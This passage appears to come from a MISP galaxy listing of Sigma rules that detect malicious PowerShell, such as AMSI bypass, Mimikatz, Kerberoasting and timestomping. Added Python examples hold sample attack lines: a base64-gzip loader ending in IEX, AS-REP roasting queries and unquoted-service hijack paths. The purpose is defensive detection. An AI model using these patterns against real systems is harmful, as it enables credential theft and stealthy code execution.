author Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/23
falsepositive ['Legitimate use of the library for administrative activity']
filename posh_ps_aadinternals_cmdlets_execution.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.reconnaissance', 'attack.discovery', 'attack.credential_access', 'attack.impact']

Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell

Detects obfuscated PowerShell launched via the RUNDLL LAUNCHER technique.

Internal MISP references

UUID e6cb92b4-b470-4eb8-8a9d-d63e8583aae0 which can be used as unique global reference for Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/18
falsepositive ['Unknown']
filename posh_ps_invoke_obfuscation_via_rundll.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']

Potential PowerShell Obfuscation Using Alias Cmdlets

Detects Set-Alias or New-Alias cmdlet usage, which can be used as a means to obfuscate PowerShell scripts.

Internal MISP references

UUID 96cd126d-f970-49c4-848a-da3a09f55c55 which can be used as unique global reference for Potential PowerShell Obfuscation Using Alias Cmdlets in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/01/08
falsepositive ['Unknown']
filename posh_ps_susp_set_alias.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1027', 'attack.t1059.001']

Suspicious New-PSDrive to Admin Share

Adversaries may use Valid Accounts to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.

Internal MISP references

UUID 1c563233-030e-4a07-af8c-ee0490a66d3a which can be used as unique global reference for Suspicious New-PSDrive to Admin Share in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/13
falsepositive ['Unknown']
filename posh_ps_susp_new_psdrive.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002']

Request A Single Ticket via PowerShell

Detects use of native PowerShell identity modules to query the domain and extract the Service Principal Names for a single computer. This behavior is typically seen during a Kerberoasting or silver ticket attack. A successful execution will output the SPNs for the endpoint in question.

Internal MISP references

UUID a861d835-af37-4930-bcd6-5b178bfb54df which can be used as unique global reference for Request A Single Ticket via PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/28
falsepositive ['Unknown']
filename posh_ps_request_kerberos_ticket.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.t1558.003']

NTFS Alternate Data Stream

Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.

Internal MISP references

UUID 8c521530-5169-495d-a199-0a3a881ad24e which can be used as unique global reference for NTFS Alternate Data Stream in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sami Ruohonen
creation_date 2018/07/24
falsepositive ['Unknown']
filename posh_ps_ntfs_ads_access.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004', 'attack.execution', 'attack.t1059.001']

Get-ADUser Enumeration Using UserAccountControl Flags

Detects Get-ADUser queries that filter on UserAccountControl flags, in particular for accounts that do not require Kerberos pre-authentication, which is the precondition for AS-REP roasting. AS-REP roasting is an often-overlooked attack; it is not very common because pre-authentication has to be explicitly disabled on the target accounts.
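
The Python below is an added illustration of the behaviour this rule looks for; it is not part of this galaxy page or of the Sigma rule itself. It decodes the UserAccountControl bitmask that such queries filter on, lists which accounts are actually AS-REP roastable (the flag is set and the account is not disabled), and matches constructed script block text against the two query shapes an attacker typically uses. The flag values are the documented AD constants; the sample accounts, the sample script blocks and the simplified match patterns are assumptions made for this example and are not the rule's actual detection strings.

```python
from __future__ import annotations

import re

# Documented AD UserAccountControl bit flags (subset).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",  # 4194304: Kerberos pre-authentication not required
}
DONT_REQ_PREAUTH = 0x400000
ACCOUNTDISABLE = 0x0002


def decode_uac(value: int) -> list[str]:
    """Names of the known flags set in a UserAccountControl value."""
    return [name for bit, name in UAC_FLAGS.items() if value & bit]


def asrep_roastable(accounts: list[dict]) -> list[str]:
    """Accounts whose AS-REP can be requested without pre-authentication.

    Disabled accounts are skipped: the KDC answers them with an error instead of
    an encrypted AS-REP, so they yield nothing to crack offline.
    """
    return [
        a["sam"] for a in accounts
        if a["uac"] & DONT_REQ_PREAUTH and not a["uac"] & ACCOUNTDISABLE
    ]


# Simplified approximation of the detection idea: Get-ADUser plus a filter on the
# pre-auth flag, either as the raw bit or via the DoesNotRequirePreAuth property.
# Assumed patterns for this example, not the Sigma rule's exact strings.
PREAUTH_ENUM_PATTERNS = [
    re.compile(r"get-aduser", re.I),
    re.compile(r"useraccountcontrol\s*-band\s*4194304|doesnotrequirepreauth\s*-eq\s*\$true", re.I),
]


def is_preauth_enumeration(script_block: str) -> bool:
    """True when a 4104 ScriptBlockText matches every required pattern."""
    return all(p.search(script_block) for p in PREAUTH_ENUM_PATTERNS)


# Constructed sample data (not real accounts and not real log events).
SAMPLE_ACCOUNTS = [
    {"sam": "svc_backup", "uac": 0x0200 | DONT_REQ_PREAUTH},
    {"sam": "j.doe", "uac": 0x0200},
    {"sam": "old_svc", "uac": 0x0200 | DONT_REQ_PREAUTH | ACCOUNTDISABLE},
]
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ADUser -Filter {useraccountcontrol -band 4194304} -Properties useraccountcontrol",
    "Get-ADUser -Filter * -Properties DoesNotRequirePreAuth | ? {$_.DoesNotRequirePreAuth -eq $True}",
    "Get-ADUser j.doe -Properties mail",
]

if __name__ == "__main__":
    print("roastable:", asrep_roastable(SAMPLE_ACCOUNTS))
    for block in SAMPLE_SCRIPT_BLOCKS:
        print(is_preauth_enumeration(block), block)
```

The third sample block shows why the rule is rated medium rather than high: Get-ADUser on its own is routine administration, and only the combination with the pre-auth flag filter is worth an alert. Defensively, the same `asrep_roastable` check run against a real export of UserAccountControl values tells you which accounts to fix before an attacker asks the DC the same question.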

Internal MISP references

UUID 96c982fe-3d08-4df4-bed2-eb14e02f21c8 which can be used as unique global reference for Get-ADUser Enumeration Using UserAccountControl Flags in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/17
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_as_rep_roasting.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1033']

Powershell Create Scheduled Task

Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code.

Internal MISP references

UUID 363eccc0-279a-4ccf-a3ab-24c2e63b11fb which can be used as unique global reference for Powershell Create Scheduled Task in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/28
falsepositive ['Unknown']
filename posh_ps_cmdlet_scheduled_task.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.persistence', 'attack.t1053.005']

Powershell Timestomp

Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.
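
Three of the rules on this page (PowerShell Write-EventLog Usage, NTFS Alternate Data Stream and Powershell Timestomp) share the same shape: a set of substrings that must all appear in a PowerShell 4104 ScriptBlockText event, optionally combined with a set of which at least one must appear. The Python below is an added example of that matching logic run over constructed script block events; it is not the Sigma rule YAML or any Sigma tooling. The substrings are simplified approximations chosen for this example, not the rules' exact detection values, and the events are made up.

```python
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    title: str
    all_of: tuple[str, ...] = ()  # every substring must be present (Sigma contains|all)
    any_of: tuple[str, ...] = ()  # at least one must be present, when given


# Simplified approximations of three rules on this page; the substrings are
# assumed for this example and are not the Sigma YAML's exact detection values.
RULES = (
    Rule("PowerShell Write-EventLog Usage", all_of=("write-eventlog", "-rawdata")),
    Rule("NTFS Alternate Data Stream", all_of=("-stream ",), any_of=("set-content", "add-content")),
    Rule("Powershell Timestomp", any_of=(
        ".creationtime=", ".creationtimeutc=",
        ".lastwritetime=", ".lastwritetimeutc=",
        ".lastaccesstime=", ".lastaccesstimeutc=",
    )),
)


def normalize(text: str) -> str:
    """Lower-case (Sigma 'contains' is case-insensitive) and drop whitespace around '='
    so that `$f.CreationTime = $t` and `$f.CreationTime=$t` compare equal."""
    return re.sub(r"\s*=\s*", "=", text.lower())


def rule_matches(rule: Rule, script_block: str) -> bool:
    text = normalize(script_block)
    if not all(s in text for s in rule.all_of):
        return False
    return not rule.any_of or any(s in text for s in rule.any_of)


def scan(events: list[dict], rules=RULES) -> list[tuple[int, str]]:
    """(EventRecordID, rule title) for every rule that each 4104 event triggers."""
    return [
        (ev["EventRecordID"], r.title)
        for ev in events
        for r in rules
        if ev.get("EventID") == 4104 and rule_matches(r, ev["ScriptBlockText"])
    ]


# Constructed Microsoft-Windows-PowerShell/Operational 4104 events (not real logs).
SAMPLE_EVENTS = [
    {"EventRecordID": 1, "EventID": 4104,
     "ScriptBlockText": 'Write-EventLog -LogName Application -Source MyApp -EventId 1000 -RawData $stage'},
    {"EventRecordID": 2, "EventID": 4104,
     "ScriptBlockText": r'Set-Content -Path C:\Users\Public\readme.txt -Stream hidden -Value $enc'},
    {"EventRecordID": 3, "EventID": 4104,
     "ScriptBlockText": r'$f = Get-Item C:\ProgramData\svc.exe; $f.CreationTime = "01/01/2019 09:00"; $f.LastWriteTime=$f.CreationTime'},
    {"EventRecordID": 4, "EventID": 4104,
     "ScriptBlockText": r'Get-Content -Path C:\Temp\app.log | Select-String -Pattern "error"'},
]

if __name__ == "__main__":
    for record_id, title in scan(SAMPLE_EVENTS):
        print(f"event {record_id}: {title}")
```

Two points the matcher makes explicit. Script Block Logging must be enabled for any of these rules to fire, since 4104 is the only source of the script text. And the ADS rule requires a writing cmdlet alongside `-Stream`: reading `Zone.Identifier` with Get-Content is normal, so the `any_of` set keeps that out of the alert.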

Internal MISP references

UUID c6438007-e081-42ce-9483-b067fbef33c3 which can be used as unique global reference for Powershell Timestomp in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/08/03
falsepositive ['Legitimate admin script']
filename posh_ps_timestomp.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.006']

PowerShell PSAttack

Detects the use of PSAttack PowerShell hack tool

Internal MISP references

UUID b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5 which can be used as unique global reference for PowerShell PSAttack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sean Metcalf (source), Florian Roth (Nextron Systems)
creation_date 2017/03/05
falsepositive ['Unknown']
filename posh_ps_psattack.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

Suspicious Hyper-V Cmdlets

Adversaries may carry out malicious operations using a virtual instance to avoid detection.

Internal MISP references

UUID 42d36aa1-3240-4db0-8257-e0118dcdd9cd which can be used as unique global reference for Suspicious Hyper-V Cmdlets in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/09
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_susp_hyper_v_condlet.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.006']

Service Registry Permissions Weakness Check

Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in Registry permissions to redirect from the originally specified executable to one that they control, in order to launch their own code at service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services.

Internal MISP references

UUID 95afc12e-3cbb-40c3-9340-84a032e596a3 which can be used as unique global reference for Service Registry Permissions Weakness Check in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/30
falsepositive ['Legitimate administrative script']
filename posh_ps_get_acl_service.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.persistence', 'attack.t1574.011', 'stp.2a']

Create Volume Shadow Copy with Powershell

Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information.

Internal MISP references

UUID afd12fed-b0ec-45c9-a13d-aa86625dac81 which can be used as unique global reference for Create Volume Shadow Copy with Powershell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/12
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_create_volume_shadow_copy.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.003']

Veeam Backup Servers Credential Dumping Script Execution

Detects execution of a PowerShell script that contains calls to the "Veeam.Backup" class, in order to dump stored credentials.

Internal MISP references

UUID 976d6e6f-a04b-4900-9713-0134a353e38b which can be used as unique global reference for Veeam Backup Servers Credential Dumping Script Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/04
falsepositive ['Administrators backup scripts (must be investigated)']
filename posh_ps_veeam_credential_dumping_script.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access']

Enable Windows Remote Management

Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.

Internal MISP references

UUID 991a9744-f2f0-44f2-bd33-9092eba17dc3 which can be used as unique global reference for Enable Windows Remote Management in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/07
falsepositive ['Legitimate script']
filename posh_ps_enable_psremoting.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.006']

Suspicious PowerShell Mailbox SMTP Forward Rule

Detects usage of the PowerShell Set-Mailbox cmdlet to set up an SMTP forwarding rule.

Internal MISP references

UUID 15b7abbb-8b40-4d01-9ee2-b51994b1d474 which can be used as unique global reference for Suspicious PowerShell Mailbox SMTP Forward Rule in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/26
falsepositive ['Legitimate usage of the cmdlet to forward emails']
filename posh_ps_exchange_mailbox_smpt_forwarding_rule.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.exfiltration']

Suspicious Eventlog Clear

Detects usage of known PowerShell cmdlets such as "Clear-EventLog" to clear the Windows event logs.

Internal MISP references

UUID 0f017df3-8f5a-414f-ad6b-24aff1128278 which can be used as unique global reference for Suspicious Eventlog Clear in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/12
falsepositive ["Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate"]
filename posh_ps_susp_clear_eventlog.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.001']

Suspicious Get Information for SMB Share

Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.

Internal MISP references

UUID 95f0643a-ed40-467c-806b-aac9542ec5ab which can be used as unique global reference for Suspicious Get Information for SMB Share in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/15
falsepositive ['Unknown']
filename posh_ps_susp_smb_share_reco.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1069.001']

Suspicious FromBase64String Usage On Gzip Archive - Ps Script

Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.
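
The tell this rule relies on is that a gzip stream always begins with the bytes 1f 8b 08, which base64-encode to the prefix "H4sI"; a script that calls FromBase64String on a literal starting with that prefix is inflating an embedded archive. The Python below is an added example, not part of this page or of the Sigma rule: it applies that cheap prefix check to a constructed loader script block, and also does the more expensive thing an analyst wants next, pulling every base64 run out of the block, testing whether it decodes to gzip, and inflating it to see the second stage. The loader text and the harmless stand-in payload are constructed for the example.

```python
from __future__ import annotations

import base64
import binascii
import gzip
import re

B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
GZIP_MAGIC = b"\x1f\x8b"
# Any base64-encoded gzip stream begins with "H4sI": that is bytes 1f 8b 08 re-encoded.
B64_GZIP_PREFIX = "H4sI"
LOADER_PATTERN = re.compile(r"FromBase64String\(\s*['\"]" + B64_GZIP_PREFIX)


def find_gzip_blobs(script_block: str) -> list[tuple[str, bytes | None]]:
    """Return (base64_token, inflated_bytes) for each base64 run that decodes to gzip.

    inflated_bytes is None when the header is gzip but the body is truncated or corrupt,
    which still deserves a look (a staged or partially logged payload).
    """
    found = []
    for token in B64_RUN.findall(script_block):
        try:
            raw = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            continue  # not actually base64 (e.g. a long identifier)
        if not raw.startswith(GZIP_MAGIC):
            continue
        try:
            found.append((token, gzip.decompress(raw)))
        except (OSError, EOFError):
            found.append((token, None))
    return found


def is_base64_gzip_loader(script_block: str) -> bool:
    """Cheap rule-style check: FromBase64String applied to a literal starting with H4sI."""
    return LOADER_PATTERN.search(script_block) is not None


# Constructed sample: a harmless stand-in second stage, gzip-compressed and base64-encoded
# the way a loader embeds it (mtime=0 keeps the blob deterministic between runs).
STAGE_TWO = b"Write-Host 'stage two'"
BLOB = base64.b64encode(gzip.compress(STAGE_TWO, mtime=0)).decode()
LOADER_BLOCK = (
    '$ms = New-Object IO.MemoryStream(,[Convert]::FromBase64String("' + BLOB + '"));'
    '$gz = New-Object IO.Compression.GZipStream($ms,[IO.Compression.CompressionMode]::Decompress);'
    'IEX (New-Object IO.StreamReader($gz)).ReadToEnd()'
)
BENIGN_BLOCK = '$bytes = [Convert]::FromBase64String("SGVsbG8gV29ybGQ=")'  # plain "Hello World"

if __name__ == "__main__":
    print("loader?", is_base64_gzip_loader(LOADER_BLOCK), is_base64_gzip_loader(BENIGN_BLOCK))
    for token, data in find_gzip_blobs(LOADER_BLOCK):
        print(token[:12] + "...", "->", data)
```

The prefix check is what belongs in the detection rule: it costs one substring comparison per event and ignores the plain base64 that legitimate scripts carry (the benign block above). The decode-and-inflate pass belongs in triage, where the inflated bytes answer the question the alert raises, namely what the script was about to run.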

Internal MISP references

UUID df69cb1d-b891-4cd9-90c7-d617d90100ce which can be used as unique global reference for Suspicious FromBase64String Usage On Gzip Archive - Ps Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/23
falsepositive ['Legitimate administrative script']
filename posh_ps_frombase64string_archive.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.command_and_control', 'attack.t1132.001']

Malicious ShellIntel PowerShell Commandlets

Detects Commandlet names from ShellIntel exploitation scripts.

Internal MISP references

UUID 402e1e1d-ad59-47b6-bf80-1ee44985b3a7 which can be used as unique global reference for Malicious ShellIntel PowerShell Commandlets in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
creation_date 2021/08/09
falsepositive ['Unknown']
filename posh_ps_shellintel_malicious_commandlets.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

WMIC Unquoted Services Path Lookup - PowerShell

Detects a known WMI reconnaissance method for looking up unquoted service paths, often used by pentesters and attackers inside PowerShell enumeration scripts.
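
What the recon one-liner is looking for is an auto-start service whose binary path contains spaces but no quotes, because Windows then tries each space-delimited prefix as an executable before reaching the real one. The Python below is an added example of the same audit run from the defender's side over constructed Win32_Service rows; it is not the Sigma rule and not code from any of the tools the rule targets. The row format (Name, PathName, StartMode, the fields `Get-CimInstance Win32_Service` returns) and the sample services are assumptions made for this example.

```python
from __future__ import annotations

import re

# Services under the Windows directory are skipped, as the classic recon one-liner does:
# a low-privileged user cannot plant a binary there anyway.
SYSTEM_PREFIX = "c:\\windows\\"


def hijack_candidates(path: str) -> list[str]:
    r"""Paths Windows may try before the real binary when an unquoted path has spaces.

    'C:\Program Files\Acme Agent\agent.exe' -> ['C:\Program.exe', 'C:\Program Files\Acme.exe']
    Arguments after the .exe are ignored; only spaces inside the binary path matter.
    """
    binary_path = re.split(r"\.exe\b", path, maxsplit=1, flags=re.I)[0]
    words = binary_path.split(" ")
    return [" ".join(words[:i]) + ".exe" for i in range(1, len(words))]


def unquoted_service_paths(services: list[dict]) -> list[tuple[str, list[str]]]:
    """Auto-start services with an unquoted, space-containing binary path outside C:\\Windows."""
    findings = []
    for svc in services:
        path = svc["PathName"].strip()
        if svc.get("StartMode", "").lower() != "auto":
            continue  # the hijack pays off at boot, so manual services are lower value
        if path.startswith('"') or path.lower().startswith(SYSTEM_PREFIX):
            continue
        candidates = hijack_candidates(path)
        if candidates:
            findings.append((svc["Name"], candidates))
    return findings


# Constructed rows in the shape of `Get-CimInstance Win32_Service | Select Name,PathName,StartMode`.
SAMPLE_SERVICES = [
    {"Name": "AcmeAgent", "PathName": r"C:\Program Files\Acme Agent\agent.exe", "StartMode": "Auto"},
    {"Name": "OtherTool", "PathName": r'"C:\Program Files\Other Tool\tool.exe" -service', "StartMode": "Auto"},
    {"Name": "Spooler", "PathName": r"C:\Windows\System32\spoolsv.exe", "StartMode": "Auto"},
    {"Name": "LabSvc", "PathName": r"C:\Tools\Lab Svc\lab.exe", "StartMode": "Manual"},
    {"Name": "NoSpaces", "PathName": r"C:\Tools\plain.exe -v", "StartMode": "Auto"},
]

if __name__ == "__main__":
    for name, candidates in unquoted_service_paths(SAMPLE_SERVICES):
        print(f"{name}: writable {candidates} would give code execution as the service account")
```

The finding is only exploitable if the attacker can create one of the candidate files, so the follow-up check is the ACL on `C:\` and on each intermediate directory; the fix is to quote the ImagePath in the service's registry key, which is exactly the key the Service Registry Permissions Weakness Check rule above watches being read.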

Internal MISP references

UUID 09658312-bc27-4a3b-91c5-e49ab9046d1b which can be used as unique global reference for WMIC Unquoted Services Path Lookup - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/20
falsepositive ['Unknown']
filename posh_ps_wmi_unquoted_service_search.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1047']

Certificate Exported Via PowerShell - ScriptBlock

Detects calls to cmdlets inside of PowerShell scripts that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.

Internal MISP references

UUID aa7a3fce-bef5-4311-9cc1-5f04bb8c308c which can be used as unique global reference for Certificate Exported Via PowerShell - ScriptBlock in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/04/23
falsepositive ['Legitimate certificate exports by administrators. Additional filters might be required.']
filename posh_ps_export_certificate.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.004']

PowerShell Script Change Permission Via Set-Acl - PsScript

Detects PowerShell scripts that set the ACL of a file or a folder.

Internal MISP references

UUID cae80281-ef23-44c5-873b-fd48d2666f49 which can be used as unique global reference for PowerShell Script Change Permission Via Set-Acl - PsScript in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/18
falsepositive ['Unknown']
filename posh_ps_set_acl.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1222']

AMSI Bypass Pattern Assembly GetType

Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts.

Internal MISP references

UUID e0d6c087-2d1c-47fd-8799-3904103c5a98 which can be used as unique global reference for AMSI Bypass Pattern Assembly GetType in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/11/09
falsepositive ['Unknown']
filename posh_ps_amsi_bypass_pattern_nov22.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001', 'attack.execution']

Suspicious Invoke-Item From Mount-DiskImage

Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.

Internal MISP references

UUID 902cedee-0398-4e3a-8183-6f3a89773a96 which can be used as unique global reference for Suspicious Invoke-Item From Mount-DiskImage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/01
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_run_from_mount_diskimage.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1553.005']

Security Software Discovery Via Powershell Script

Detects calls to "get-process" where the output is piped to a "where-object" filter to search for security solution processes. Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus.

Internal MISP references

UUID 904e8e61-8edf-4350-b59c-b905fc8e810c which can be used as unique global reference for Security Software Discovery Via Powershell Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Anish Bogati, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/12/16
falsepositive ['False positives might occur due to the nature of the ScriptBlock being ingested as a big blob. Initial tuning is required.', 'As the "selection_cmdlet" is common in scripts the matching engine might slow down the search. Change into regex or a more accurate string to avoid heavy resource consumption if experienced']
filename posh_ps_get_process_security_software_discovery.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1518.001']

Powershell Local Email Collection

Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user's local system, such as Outlook storage or cache files.

Internal MISP references

UUID 2837e152-93c8-43d2-85ba-c3cd3c2ae614 which can be used as unique global reference for Powershell Local Email Collection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/21
falsepositive ['Unknown']
filename posh_ps_susp_mail_acces.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.collection', 'attack.t1114.001']

Suspicious PowerShell Get Current User

Detects the use of PowerShell to identify the currently logged-on user.

Internal MISP references

UUID 4096a49c-7de4-4da0-a230-c66ccd56ea5a which can be used as unique global reference for Suspicious PowerShell Get Current User in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/04
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_susp_get_current_user.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1033']

User Discovery And Export Via Get-ADUser Cmdlet - PowerShell

Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file.

Internal MISP references

UUID c2993223-6da8-4b1a-88ee-668b8bf315e9 which can be used as unique global reference for User Discovery And Export Via Get-ADUser Cmdlet - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/11/17
falsepositive ["Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often"]
filename posh_ps_user_discovery_get_aduser.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1033']

Winlogon Helper DLL

Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[Wow6432Node]Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables.

Internal MISP references

UUID 851c506b-6b7c-4ce2-8802-c703009d03c0 which can be used as unique global reference for Winlogon Helper DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2019/10/21
falsepositive ['Unknown']
filename posh_ps_winlogon_helper_dll.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.persistence', 'attack.t1547.004']

Suspicious Service DACL Modification Via Set-Service Cmdlet - PS

Detects usage of the "Set-Service" PowerShell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service", etc. (Works only in PowerShell 7.)

Internal MISP references

UUID 22d80745-6f2c-46da-826b-77adaededd74 which can be used as unique global reference for Suspicious Service DACL Modification Via Set-Service Cmdlet - PS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/24
falsepositive ['Rare intended use of hidden services', 'Rare FP could occur due to the non linearity of the ScriptBlockText log']
filename posh_ps_susp_service_dacl_modification_set_service.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.011']

Potential Invoke-Mimikatz PowerShell Script

Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.

Internal MISP references

UUID 189e3b02-82b2-4b90-9662-411eb64486d4 which can be used as unique global reference for Potential Invoke-Mimikatz PowerShell Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic (idea)
creation_date 2022/09/28
falsepositive ['Mimikatz can be useful for testing the security of networks']
filename posh_ps_potential_invoke_mimikatz.yml
level high
logsource.category ps_script
logsource.product windows
